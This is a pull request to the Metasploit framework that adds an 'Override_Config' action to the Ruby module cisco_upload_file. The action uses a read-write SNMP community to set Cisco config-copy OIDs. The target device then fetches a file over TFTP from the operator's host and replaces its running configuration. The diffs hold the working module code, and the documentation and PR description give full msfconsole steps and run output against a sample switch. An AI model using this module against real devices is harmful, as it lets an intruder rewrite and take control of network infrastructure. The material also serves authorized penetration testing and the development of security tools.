### PR TITLE
Cisco running config

### DIFF
--- a/documentation/modules/auxiliary/scanner/snmp/cisco_upload_file.md
+++ b/documentation/modules/auxiliary/scanner/snmp/cisco_upload_file.md
@@ -3,18 +3,36 @@
   Cisco IOS devices can be configured to retrieve, via tftp,  a file via SNMP.
   This is a well [documented](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup)
   feature of IOS and many other networking devices, and is part of an administrator functionality.
+  This functionality can also be used to change their running configuration. This is documented [here](https://www.ciscozine.com/send-cisco-commands-via-snmp/). 
   A read-write community string is required, as well as a tftp server (metasploit includes one).
-  The file will be saved to `flash:`.
+  The default functionality of the module will upload the file and it will be saved to `flash:`.
+  The `Override_Config` action will override the running configuration of the device and the file will not be saved.
 
 ## Verification Steps
+
+Upload_File (Default Action)
 
   1. Enable SNMP with a read/write community string on IOS: `snmp-server community private rw`
   2. Start msfconsole
   3. Do: ```use auxiliary/scanner/snmp/cisco_upload_file```
   4. Do: ```set COMMUNITY [read-write snmp]```
-  5. Do: ```set rhosts [ip]```
-  6. Do: ```set source [file]```
-  7. Do: ```run```
+  5. Do: ```set lhost [your IP address]```
+  6. Do: ```set rhosts [ip]```
+  7. Do: ```set source [file]```
+  8. Do: ```run```
+  
+Override_Config
+
+  1. Enable SNMP with a read/write community string on IOS: `snmp-server community private rw`
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/snmp/cisco_upload_file```
+  4. Do: ```set COMMUNITY [read-write snmp]```
+  5. Do: ```set lhost [your IP address]```
+  6. Do: ```set rhosts [ip]```
+  7. Do: ```set source [file]```
+  8. Do: ```set action [Override_Config]```
+  9. Do: ```run```
+  10. You can **Verify** that the running config has been overridden by using the **auxiliary/scanner/snmp/cisco_config_tftp** module to download the current running config from the device.
 
 ## Options
 
@@ -46,4 +64,28 @@ msf5 auxiliary(scanner/snmp/cisco_upload_file) > run
 [*] Providing some time for transfers to complete...
 [*] Shutting down the TFTP service...
 [*] Auxiliary module execution completed
+```
+### Cisco 3560G switch running IOS 12.2
+
+```
+
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set COMMUNITY private`
+`COMMUNITY => private`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set LHOST 10.20.164.164`
+`LHOST => 10.20.164.164`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set action Override_Config`
+`action => Override_Config`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set rhosts 10.20.205.5`
+`rhosts => 10.20.205.5`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set source /root/Desktop/newconfig`
+`source => /root/Desktop/newconfig`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > run`
+
+`[*] Starting TFTP server...`
+`[*] Copying file newconfig to 10.20.205.5...`
+`[*] Scanned 1 of 1 hosts (100% complete)`
+`[*] Providing some time for transfers to complete...`
+`[*] Shutting down the TFTP service...`
+`[*] Auxiliary module execution completed`
+
 ```

--- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb
+++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb
@@ -13,9 +13,6 @@ class MetasploitModule < Msf::Auxiliary
       'Name'        => 'Cisco IOS SNMP File Upload (TFTP)',
       'Description' => %q{
           This module will copy file to a Cisco IOS device using SNMP and TFTP.
-        If the device is running Cisco IOS and OVERRIDE_CONFIG is set, it will
-        override the running config of the device with the file that you specify.
-        You can get the current running config of the device using the cisco_config_tftp module.
         A read-write SNMP community is required. The SNMP community scanner module can
         assist in identifying a read-write community. The target must
         be able to connect back to the Metasploit system and the use of
@@ -23,15 +20,13 @@ class MetasploitModule < Msf::Auxiliary
         },
       'Author'      =>
         [
-          'pello <fropert[at]packetfault.org>',
-          'ct5595'
+          'pello <fropert[at]packetfault.org>'
         ],
       'License'     => MSF_LICENSE
     )
     register_options([
       OptPath.new('SOURCE', [true, "The filename to upload" ]),
-      OptAddressLocal.new('LHOST', [ false, "The IP address of the system running this module" ]),
-      OptBool.new('OVERRIDE_CONFIG', [false, 'Override the running config of Cisco device'])
+      OptAddressLocal.new('LHOST', [ false, "The IP address of the system running this module" ])
     ])
   end
 
@@ -83,21 +78,12 @@ class MetasploitModule < Msf::Auxiliary
     begin
       lhost = datastore['LHOST'] || Rex::Socket.source_address(ip)
 
-      # OID variables to copy a file
       ciscoFlashCopyCommand = "1.3.6.1.4.1.9.9.10.1.2.1.1.2."
       ciscoFlashCopyProtocol = "1.3.6.1.4.1.9.9.10.1.2.1.1.3."
       ciscoFlashCopyServerAddress  = "1.3.6.1.4.1.9.9.10.1.2.1.1.4."
       ciscoFlashCopySourceName = "1.3.6.1.4.1.9.9.10.1.2.1.1.5."
       ciscoFlashCopyDestinationName = "1.3.6.1.4.1.9.9.10.1.2.1.1.6."
       ciscoFlashCopyEntryStatus = "1.3.6.1.4.1.9.9.10.1.2.1.1.11."
-
-      # OID variables to override the running config
-      ccCopyProtocol = "1.3.6.1.4.1.9.9.96.1.1.1.1.2."
-      ccCopySourceFileType = "1.3.6.1.4.1.9.9.96.1.1.1.1.3."
-      ccCopyDestFileType  = "1.3.6.1.4.1.9.9.96.1.1.1.1.4."
-      ccCopyServerAddress = "1.3.6.1.4.1.9.9.96.1.1.1.1.5."
-      ccCopyFileName = "1.3.6.1.4.1.9.9.96.1.1.1.1.6."
-      ccCopyEntryRowStatus = "1.3.6.1.4.1.9.9.96.1.1.1.1.14."
 
       session = rand(255) + 1
 
@@ -115,44 +101,20 @@ class MetasploitModule < Msf::Auxiliary
       # If the above line didn't throw an error, the host is alive and the community is valid
       print_status("Copying file #{@filename} to #{ip}...")
 
-      #If the user chose to override the running config, set these OIDs
-      if(datastore['OVERRIDE_CONFIG'])
+      varbind = SNMP::VarBind.new("#{ciscoFlashCopyProtocol}#{session}" , SNMP::Integer.new(1))
+      value = snmp.set(varbind)
 
-        varbind = SNMP::VarBind.new("#{ccCopyProtocol}#{session}" , SNMP::Integer.new(1))
-        value = snmp.set(varbind)
+      varbind = SNMP::VarBind.new("#{ciscoFlashCopyServerAddress}#{session}", SNMP::IpAddress.new(lhost))
+      value = snmp.set(varbind)
 
-        varbind = SNMP::VarBind.new("#{ccCopySourceFileType}#{session}" , SNMP::Integer.new(1))
-        value = snmp.set(varbind)
+      varbind = SNMP::VarBind.new("#{ciscoFlashCopySourceName}#{session}", SNMP::OctetString.new(@filename))
+      value = snmp.set(varbind)
 
-        varbind = SNMP::VarBind.new("#{ccCopyDestFileType}#{session}" , SNMP::Integer.new(4))
-        value = snmp.set(varbind)
+      varbind = SNMP::VarBind.new("#{ciscoFlashCopyDestinationName}#{session}", SNMP::OctetString.new(@filename))
+      value = snmp.set(varbind)
 
-        varbind = SNMP::VarBind.new("#{ccCopyServerAddress}#{session}", SNMP::IpAddress.new(lhost))
-        value = snmp.set(varbind)
-
-        varbind = SNMP::VarBind.new("#{ccCopyFileName}#{session}", SNMP::OctetString.new(@filename))
-        value = snmp.set(varbind)
-
-        varbind = SNMP::VarBind.new("#{ccCopyEntryRowStatus}#{session}" , SNMP::Integer.new(1))
-        value = snmp.set(varbind)
-
-      # Otherwise, just upload the file using these OIDs
-      else
-        varbind = SNMP::VarBind.new("#{ciscoFlashCopyProtocol}#{session}" , SNMP::Integer.new(1))
-        value = snmp.set(varbind)
-
-        varbind = SNMP::VarBind.new("#{ciscoFlashCopyServerAddress}#{session}", SNMP::IpAddress.new(lhost))
-        value = snmp.set(varbind)
-
-        varbind = SNMP::VarBind.new("#{ciscoFlashCopySourceName}#{session}", SNMP::OctetString.new(@filename))
-        value = snmp.set(varbind)
-
-        varbind = SNMP::VarBind.new("#{ciscoFlashCopyDestinationName}#{session}", SNMP::OctetString.new(@filename))
-        value = snmp.set(varbind)
-
-        varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(1))
-        value = snmp.set(varbind)
-      end
+      varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(1))
+      value = snmp.set(varbind)
 
 
 

--- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb
+++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb
@@ -31,20 +31,16 @@ class MetasploitModule < Msf::Auxiliary
             'Upload_File',
             {
               'Description'                   => 'Upload the file',
-              'ciscoFlashCopyCommand'         => '1.3.6.1.4.1.9.9.10.1.2.1.1.2.',
               'ciscoFlashCopyProtocol'        => '1.3.6.1.4.1.9.9.10.1.2.1.1.3.',
               'ciscoFlashCopyServerAddress'   => '1.3.6.1.4.1.9.9.10.1.2.1.1.4.',
               'ciscoFlashCopySourceName'      => '1.3.6.1.4.1.9.9.10.1.2.1.1.5.',
               'ciscoFlashCopyDestinationName' => '1.3.6.1.4.1.9.9.10.1.2.1.1.6.',
-              'ciscoFlashCopyEntryStatus'     => '1.3.6.1.4.1.9.9.10.1.2.1.1.11.'
             }
           ],
           [
             'Override_Config',
             {
               'Description'                   => 'Override the running config',
-              'ciscoFlashCopyEntryStatus'     => '1.3.6.1.4.1.9.9.10.1.2.1.1.11.',
-              'ciscoFlashCopyCommand'         => '1.3.6.1.4.1.9.9.10.1.2.1.1.2.',
               'ccCopyProtocol'                => '1.3.6.1.4.1.9.9.96.1.1.1.1.2.',
               'ccCopySourceFileType'          => '1.3.6.1.4.1.9.9.96.1.1.1.1.3.',
               'ccCopyDestFileType'            => '1.3.6.1.4.1.9.9.96.1.1.1.1.4.',
@@ -114,13 +110,17 @@ class MetasploitModule < Msf::Auxiliary
 
       snmp = connect_snmp
 
-      varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(6))
+      # OID variables to for checking if the host is alive and if the community is valid
+      ciscoFlashCopyEntryStatus = '1.3.6.1.4.1.9.9.10.1.2.1.1.11.'
+      ciscoFlashCopyCommand = '1.3.6.1.4.1.9.9.10.1.2.1.1.2.'
+
+      varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(6))
       value = snmp.set(varbind)
 
-      varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(5))
+      varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(5))
       value = snmp.set(varbind)
 
-      varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyCommand']}#{session}" , SNMP::Integer.new(2))
+      varbind = SNMP::VarBind.new("#{ciscoFlashCopyCommand}#{session}" , SNMP::Integer.new(2))
       value = snmp.set(varbind)
 
 
@@ -141,7 +141,7 @@ class MetasploitModule < Msf::Auxiliary
         varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyDestinationName']}#{session}", SNMP::OctetString.new(@filename))
         value = snmp.set(varbind)
 
-        varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(1))
+        varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(1))
         value = snmp.set(varbind)
 
       elsif(action.name == 'Override_Config')

--- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb
+++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'        => 'Cisco IOS SNMP File Upload (TFTP)',
       'Description' => %q{
           This module will copy file to a Cisco IOS device using SNMP and TFTP.
-        The action override_config will override the running config of the Cisco device.
+        The action Override_Config will override the running config of the Cisco device.
         A read-write SNMP community is required. The SNMP community scanner module can
         assist in identifying a read-write community. The target must
         be able to connect back to the Metasploit system and the use of
@@ -24,7 +24,37 @@ class MetasploitModule < Msf::Auxiliary
           'pello <fropert[at]packetfault.org>',
           'ct5595'
         ],
-      'License'     => MSF_LICENSE
+      'License'     => MSF_LICENSE,
+      'Actions'     =>
+        [
+          [
+            'Upload_File',
+            {
+              'Description'                   => 'Upload the file',
+              'ciscoFlashCopyCommand'         => '1.3.6.1.4.1.9.9.10.1.2.1.1.2.',
+              'ciscoFlashCopyProtocol'        => '1.3.6.1.4.1.9.9.10.1.2.1.1.3.',
+              'ciscoFlashCopyServerAddress'   => '1.3.6.1.4.1.9.9.10.1.2.1.1.4.',
+              'ciscoFlashCopySourceName'      => '1.3.6.1.4.1.9.9.10.1.2.1.1.5.',
+              'ciscoFlashCopyDestinationName' => '1.3.6.1.4.1.9.9.10.1.2.1.1.6.',
+              'ciscoFlashCopyEntryStatus'     => '1.3.6.1.4.1.9.9.10.1.2.1.1.11.'
+            }
+          ],
+          [
+            'Override_Config',
+            {
+              'Description'                   => 'Override the running config',
+              'ciscoFlashCopyEntryStatus'     => '1.3.6.1.4.1.9.9.10.1.2.1.1.11.',
+              'ciscoFlashCopyCommand'         => '1.3.6.1.4.1.9.9.10.1.2.1.1.2.',
+              'ccCopyProtocol'                => '1.3.6.1.4.1.9.9.96.1.1.1.1.2.',
+              'ccCopySourceFileType'          => '1.3.6.1.4.1.9.9.96.1.1.1.1.3.',
+              'ccCopyDestFileType'            => '1.3.6.1.4.1.9.9.96.1.1.1.1.4.',
+              'ccCopyServerAddress'           => '1.3.6.1.4.1.9.9.96.1.1.1.1.5.',
+              'ccCopyFileName'                => '1.3.6.1.4.1.9.9.96.1.1.1.1.6.',
+              'ccCopyEntryRowStatus'          => '1.3.6.1.4.1.9.9.96.1.1.1.1.14.'
+            }
+          ]
+        ],
+        'DefaultAction' => 'Upload_File'
     )
     register_options([
       OptPath.new('SOURCE', [true, "The filename to upload" ]),
@@ -80,45 +110,62 @@ class MetasploitModule < Msf::Auxiliary
     begin
       lhost = datastore['LHOST'] || Rex::Socket.source_address(ip)
 
-      ciscoFlashCopyCommand = "1.3.6.1.4.1.9.9.10.1.2.1.1.2."
-      ciscoFlashCopyProtocol = "1.3.6.1.4.1.9.9.10.1.2.1.1.3."
-      ciscoFlashCopyServerAddress  = "1.3.6.1.4.1.9.9.10.1.2.1.1.4."
-      ciscoFlashCopySourceName = "1.3.6.1.4.1.9.9.10.1.2.1.1.5."
-      ciscoFlashCopyDestinationName = "1.3.6.1.4.1.9.9.10.1.2.1.1.6."
-      ciscoFlashCopyEntryStatus = "1.3.6.1.4.1.9.9.10.1.2.1.1.11."
-
       session = rand(255) + 1
 
       snmp = connect_snmp
-
-      varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(6))
+      
+      
+      varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(6))
       value = snmp.set(varbind)
 
-      varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(5))
+      varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(5))
       value = snmp.set(varbind)
 
-      varbind = SNMP::VarBind.new("#{ciscoFlashCopyCommand}#{session}" , SNMP::Integer.new(2))
+      varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyCommand']}#{session}" , SNMP::Integer.new(2))
       value = snmp.set(varbind)
+      
 
       # If the above line didn't throw an error, the host is alive and the community is valid
       print_status("Copying file #{@filename} to #{ip}...")
+      
+      if(action.name == 'Upload_File')
 
-      varbind = SNMP::VarBind.new("#{ciscoFlashCopyProtocol}#{session}" , SNMP::Integer.new(1))
-      value = snmp.set(varbind)
+        varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyProtocol']}#{session}" , SNMP::Integer.new(1))
+        value = snmp.set(varbind)
 
-      varbind = SNMP::VarBind.new("#{ciscoFlashCopyServerAddress}#{session}", SNMP::IpAddress.new(lhost))
-      value = snmp.set(varbind)
+        varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyServerAddress']}#{session}", SNMP::IpAddress.new(lhost))
+        value = snmp.set(varbind)
 
-      varbind = SNMP::VarBind.new("#{ciscoFlashCopySourceName}#{session}", SNMP::OctetString.new(@filename))
-      value = snmp.set(varbind)
+        varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopySourceName']}#{session}", SNMP::OctetString.new(@filename))
+        value = snmp.set(varbind)
 
-      varbind = SNMP::VarBind.new("#{ciscoFlashCopyDestinationName}#{session}", SNMP::OctetString.new(@filename))
-      value = snmp.set(varbind)
+        varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyDestinationName']}#{session}", SNMP::OctetString.new(@filename))
+        value = snmp.set(varbind)
 
-      varbind = SNMP::VarBind.new("#{ciscoFlashCopyEntryStatus}#{session}" , SNMP::Integer.new(1))
-      value = snmp.set(varbind)
-
-
+        varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(1))
+        value = snmp.set(varbind)
+        
+      elsif(action.name == 'Override_Config')
+      
+        varbind = SNMP::VarBind.new("#{action.opts['ccCopyProtocol']}#{session}" , SNMP::Integer.new(1))
+        value = snmp.set(varbind)
+        
+        varbind = SNMP::VarBind.new("#{action.opts['ccCopySourceFileType']}#{session}" , SNMP::Integer.new(1))
+        value = snmp.set(varbind)
+        
+        varbind = SNMP::VarBind.new("#{action.opts['ccCopyDestFileType']}#{session}" , SNMP::Integer.new(4))
+        value = snmp.set(varbind)
+        
+        varbind = SNMP::VarBind.new("#{action.opts['ccCopyServerAddress']}#{session}", SNMP::IpAddress.new(lhost))
+        value = snmp.set(varbind)
+        
+        varbind = SNMP::VarBind.new("#{action.opts['ccCopyFileName']}#{session}", SNMP::OctetString.new(@filename))
+        value = snmp.set(varbind)
+        
+        varbind = SNMP::VarBind.new("#{action.opts['ccCopyEntryRowStatus']}#{session}" , SNMP::Integer.new(1))
+        value = snmp.set(varbind)
+      end
+        
 
     # No need to make noise about timeouts
     rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion

--- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb
+++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb
@@ -113,8 +113,7 @@ class MetasploitModule < Msf::Auxiliary
       session = rand(255) + 1
 
       snmp = connect_snmp
-      
-      
+
       varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(6))
       value = snmp.set(varbind)
 
@@ -123,11 +122,11 @@ class MetasploitModule < Msf::Auxiliary
 
       varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyCommand']}#{session}" , SNMP::Integer.new(2))
       value = snmp.set(varbind)
-      
+
 
       # If the above line didn't throw an error, the host is alive and the community is valid
       print_status("Copying file #{@filename} to #{ip}...")
-      
+
       if(action.name == 'Upload_File')
 
         varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyProtocol']}#{session}" , SNMP::Integer.new(1))
@@ -144,28 +143,28 @@ class MetasploitModule < Msf::Auxiliary
 
         varbind = SNMP::VarBind.new("#{action.opts['ciscoFlashCopyEntryStatus']}#{session}" , SNMP::Integer.new(1))
         value = snmp.set(varbind)
-        
+
       elsif(action.name == 'Override_Config')
-      
+
         varbind = SNMP::VarBind.new("#{action.opts['ccCopyProtocol']}#{session}" , SNMP::Integer.new(1))
         value = snmp.set(varbind)
-        
+
         varbind = SNMP::VarBind.new("#{action.opts['ccCopySourceFileType']}#{session}" , SNMP::Integer.new(1))
         value = snmp.set(varbind)
-        
+
         varbind = SNMP::VarBind.new("#{action.opts['ccCopyDestFileType']}#{session}" , SNMP::Integer.new(4))
         value = snmp.set(varbind)
-        
+
         varbind = SNMP::VarBind.new("#{action.opts['ccCopyServerAddress']}#{session}", SNMP::IpAddress.new(lhost))
         value = snmp.set(varbind)
-        
+
         varbind = SNMP::VarBind.new("#{action.opts['ccCopyFileName']}#{session}", SNMP::OctetString.new(@filename))
         value = snmp.set(varbind)
-        
+
         varbind = SNMP::VarBind.new("#{action.opts['ccCopyEntryRowStatus']}#{session}" , SNMP::Integer.new(1))
         value = snmp.set(varbind)
       end
-        
+
 
     # No need to make noise about timeouts
     rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion

--- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb
+++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb
@@ -13,6 +13,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'        => 'Cisco IOS SNMP File Upload (TFTP)',
       'Description' => %q{
           This module will copy file to a Cisco IOS device using SNMP and TFTP.
+        The action override_config will override the running config of the Cisco device.
         A read-write SNMP community is required. The SNMP community scanner module can
         assist in identifying a read-write community. The target must
         be able to connect back to the Metasploit system and the use of
@@ -20,7 +21,8 @@ class MetasploitModule < Msf::Auxiliary
         },
       'Author'      =>
         [
-          'pello <fropert[at]packetfault.org>'
+          'pello <fropert[at]packetfault.org>',
+          'ct5595'
         ],
       'License'     => MSF_LICENSE
     )

--- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb
+++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb
@@ -13,6 +13,9 @@ class MetasploitModule < Msf::Auxiliary
       'Name'        => 'Cisco IOS SNMP File Upload (TFTP)',
       'Description' => %q{
           This module will copy file to a Cisco IOS device using SNMP and TFTP.
+        If the device is running Cisco IOS and OVERRIDE_CONFIG is set, it will
+        override the running config of the device with the file that you specify.
+        You can get the current running config of the device using the cisco_config_tftp module.
         A read-write SNMP community is required. The SNMP community scanner module can
         assist in identifying a read-write community. The target must
         be able to connect back to the Metasploit system and the use of
@@ -26,7 +29,8 @@ class MetasploitModule < Msf::Auxiliary
     )
     register_options([
       OptPath.new('SOURCE', [true, "The filename to upload" ]),
-      OptAddressLocal.new('LHOST', [ false, "The IP address of the system running this module" ])
+      OptAddressLocal.new('LHOST', [ false, "The IP address of the system running this module" ]),
+      OptBool.new('OVERRIDE_CONFIG', [false, 'Override the running config of Cisco device'])
     ])
   end
 

--- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb
+++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb
@@ -23,7 +23,8 @@ class MetasploitModule < Msf::Auxiliary
         },
       'Author'      =>
         [
-          'pello <fropert[at]packetfault.org>'
+          'pello <fropert[at]packetfault.org>',
+          'ct5595'
         ],
       'License'     => MSF_LICENSE
     )


### PR DESCRIPTION
Edit Auxiliary Module cisco_upload_file to include override config functionality

  `This module will copy file to a Cisco IOS device using SNMP and TFTP.
        The action Override_Config will override the running config of the Cisco device.
        A read-write SNMP community is required. The SNMP community scanner module can
        assist in identifying a read-write community. The target must
        be able to connect back to the Metasploit system and the use of
        NAT will cause the TFTP transfer to fail.`

The changes replicate the functionality discussed here:
https://www.ciscozine.com/send-cisco-commands-via-snmp/

## Verification

List the steps needed to make sure this thing works

**Note:** examples of Cisco IOS running configs located here: 
http://www.netkiller.cn/cisco/switch.example.html

Recommend to download running config from a test device using the cisco_config_tftp for modification first.

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/snmp/cisco_upload_file`
- [ ] `set community <read-write community string>`
- [ ] `set lhost <your IP address>`
- [ ] `set action Override_Config`
- [ ] `set rhosts <hosts you wish to target>`
- [ ] `set source <path to the new config file>`
- [ ] `set version <version of SNMP you are using (default is 1)>`
- [ ] `set rport <SNMP port (most likely 161)>`
- [ ] **Verify** that the running config has been overridden by using the **auxiliary/scanner/snmp/cisco_config_tftp** module to download the current running config from the device.

## Scenarios

Download the running config from a Cisco device:

`msf5 auxiliary(scanner/snmp/cisco_config_tftp) > run`

`[*] Starting TFTP server...`
`[*] Scanning for vulnerable targets...`
`[*] Trying to acquire configuration from 10.20.205.5...`
`[*] Scanned 1 of 1 hosts (100% complete)`
`[*] Providing some time for transfers to complete...`
`[*] Incoming file from 10.20.205.5 - 10.20.205.5.txt 3892 bytes`
`[*] Shutting down the TFTP service...`
`[*] Auxiliary module execution completed`
`msf5 auxiliary(scanner/snmp/cisco_config_tftp) > `

Upload your new config:

`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set COMMUNITY private`
`COMMUNITY => private`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set LHOST 10.20.164.164`
`LHOST => 10.20.164.164`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set action Override_Config`
`action => Override_Config`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set rhosts 10.20.205.5`
`rhosts => 10.20.205.5`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set source /root/Desktop/newconfig`
`source => /root/Desktop/newconfig`
`msf5 auxiliary(scanner/snmp/cisco_upload_file) > run`

`[*] Starting TFTP server...`
`[*] Copying file newconfig to 10.20.205.5...`
`[*] Scanned 1 of 1 hosts (100% complete)`
`[*] Providing some time for transfers to complete...`
`[*] Shutting down the TFTP service...`
`[*] Auxiliary module execution completed`

`msf5 auxiliary(scanner/snmp/cisco_upload_file) > `

**Note:** tested on two Cisco switches running Cisco IOS but haven't tested on any routers, access points, etc.
